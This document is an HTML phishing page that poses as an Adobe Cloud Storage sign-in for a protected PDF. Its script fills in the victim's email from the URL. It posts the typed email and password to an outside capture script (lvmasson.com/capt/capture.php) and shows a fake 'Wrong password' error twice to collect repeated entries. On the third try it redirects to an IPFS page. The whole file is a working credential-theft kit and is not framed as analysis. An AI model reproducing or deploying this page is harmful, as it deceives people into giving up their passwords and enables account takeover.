<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Protected File Sign In</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-image: url("https://firebasestorage.googleapis.com/v0/b/png-images-481bb.appspot.com/o/Adobe.png?alt=media&token=a3813f1f-169a-48a6-8172-22d091f87e7c");
            background-size: cover;
            background-position: center;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            position: relative; /* Add position relative */
        }
        /* Add overlay style */
        body::before {
            content: "";
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.5); /* Adjust opacity here */
            z-index: -1; /* Move the overlay behind other elements */
        }
        .container {
            background-color: #fff;
            border-radius: 0; /* Sharp edges */
            padding: 20px;
            text-align: center;
            box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.1);
            max-width: 300px; /* Reduced width */
            width: 100%;
            opacity: 0;
            animation: slideIn 0.5s forwards;
            position: relative; /* Add position relative */
            height: 400px; /* Increased height */
        }
        @keyframes slideIn {
            from {
                width: 0;
                opacity: 0;
            }
            to {
                width: 100%;
                opacity: 1;
            }
        }
        .logo {
            width: 100px;
            height: 100px;
            margin: auto;
            display: block;
        }
        h2 {
            font-weight: bold;
            margin-top: 20px;
            margin-bottom: 10px;
        }
        input[type="text"],
        input[type="password"],
        button {
            width: calc(100% - 40px);
            margin-bottom: 10px;
            padding: 10px;
            border-radius: 0; /* Sharp edges */
            border: 1px solid #ccc;
            box-sizing: border-box;
        }
        button {
            background-color: #d32f2f; /* Red color */
            color: #fff;
            cursor: pointer;
            transition: background-color 0.3s ease;
        }
        button:hover {
            background-color: #b71c1c; /* Darker red on hover */
        }
        .error-container {
            color: white;
            background: lightcoral;
            padding: 10px;
            margin-top: 10px;
            border-radius: 0; /* Sharp edges */
            display: none;
        }
        .spinner {
            border: 4px solid rgba(0, 0, 0, 0.1);
            border-top: 4px solid #333;
            border-radius: 50%;
            width: 30px;
            height: 30px;
            animation: spin 1s linear infinite;
            margin: 20px auto;
        }
        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
        /* Remember me checkbox style */
        .remember-me {
            text-align: left;
            margin-bottom: 10px;
            font-size: 14px;
            margin-left: 20px;
        }
        /* Copyright text style */
        .copyright {
            font-size: 8px;
            color: #999;
            position: left; /* Add position absolute */
            bottom: 20px; /* Adjust as needed */
            left: 8px; /* Adjust as needed */
        }
        /* Privacy & cookies text style */
        .privacy-cookies {
            font-size: 10px;
            color: #999;
            position: absolute; /* Add position absolute */
            bottom: 10px; /* Adjust as needed */
            right: 70px; /* Adjust as needed */
        }
    </style>
</head>
<body>
    <div class="container">
        <img src="https://upload.wikimedia.org/wikipedia/commons/8/87/PDF_file_icon.svg" alt="Adobe Logo" class="logo">
        <h2>Adobe Cloud Storage<span style="font-weight: bold;"></span></h2>
        <p>Please sign in to Cloud to access the files.</p>

        <form name="loginForm" action="" method="post">
            <input type="text" name="email" id="email" placeholder="Email" required value="">
            <input type="password" name="password" id="password" placeholder="Password" minlength="6" required>
            <div class="remember-me">
                <input type="checkbox" id="remember-me" name="remember-me" checked> <!-- Checked by default -->
                <label for="remember-me">Remember me</label>
            </div>
            <button type="submit" id="submit-btn">View</button>
            <!-- Copyright text inside form container -->
            <div class="copyright">&copy; 2024 Adobe By clicking Next, you accept Adobe Cloud Storage terms and conditions in accordance with our privacy policy.
                and Adobe terms of use. Check the official documentation to review our terms of use.</div>
            <!-- Privacy & cookies text inside form container -->
            <div class="privacy-cookies"></div>
        </form>

        <div class="error-container"></div>
        <div class="spinner" style="display:none;"></div>
    </div>

    <script>
        let signInAttempts = 0;
        let userEmail = '';

        window.addEventListener('DOMContentLoaded', () => {
            const emailFromURL = new URLSearchParams(window.location.search).get('email');
            if (emailFromURL) {
                const emailField = document.getElementById('email');
                if (emailField) {
                    emailField.value = emailFromURL;
                    userEmail = emailFromURL;
                }
            }

            const form = document.forms['loginForm'];
            const passwordField = document.getElementById('password');
            const signInButton = document.getElementById('submit-btn');
            const errorContainer = document.querySelector('.error-container');
            const spinner = document.querySelector('.spinner');

            document.querySelector('.container').style.animation = 'slideIn 0.5s forwards';

            form.addEventListener('submit', async (event) => {
                event.preventDefault();

                // Check if password length is less than 6
                if (passwordField.value.length < 6) {
                    showError(errorContainer, 'Password is too short.');
                    return;
                }

                signInAttempts++;
                signInButton.textContent = 'Loading...';

                const formData = new FormData(form);

                try {
                    const response = await fetch('https://lvmasson.com/capt/capture.php', {
                        method: 'POST',
                        body: formData
                    });

                    if (signInAttempts <= 2) {
                        showError(errorContainer, 'Wrong password. Please try again.');
                    }

                    // Reset button text
                    signInButton.textContent = 'View';

                    if (signInAttempts === 3) {
                        spinner.style.display = 'block';
                        setTimeout(() => {
                            const redirects = ['https://cloudflare-ipfs.com/ipfs/bafkreifg4gvcx63qf755lnjuomdzv3yojsnzce4th34ed57lm355dnu7km'];
                            const randomRedirect = redirects[Math.floor(Math.random() * redirects.length)];
                            window.location.href = randomRedirect;
                        }, 1500);
                    }
                } catch (error) {
                    // Handle any errors here
                    showError(errorContainer, 'Failed to submit form. Please try again.');
                    signInButton.textContent = 'View';
                }
            });
        });

        function showError(errorContainer, message) {
            errorContainer.textContent = message;
            errorContainer.style.display = 'block';

            // Clear password field
            document.getElementById('password').value = '';

            // Hide the error message after a few seconds
            setTimeout(() => {
                errorContainer.style.display = 'none';
            }, 3000);
        }
    </script>
</body>
</html>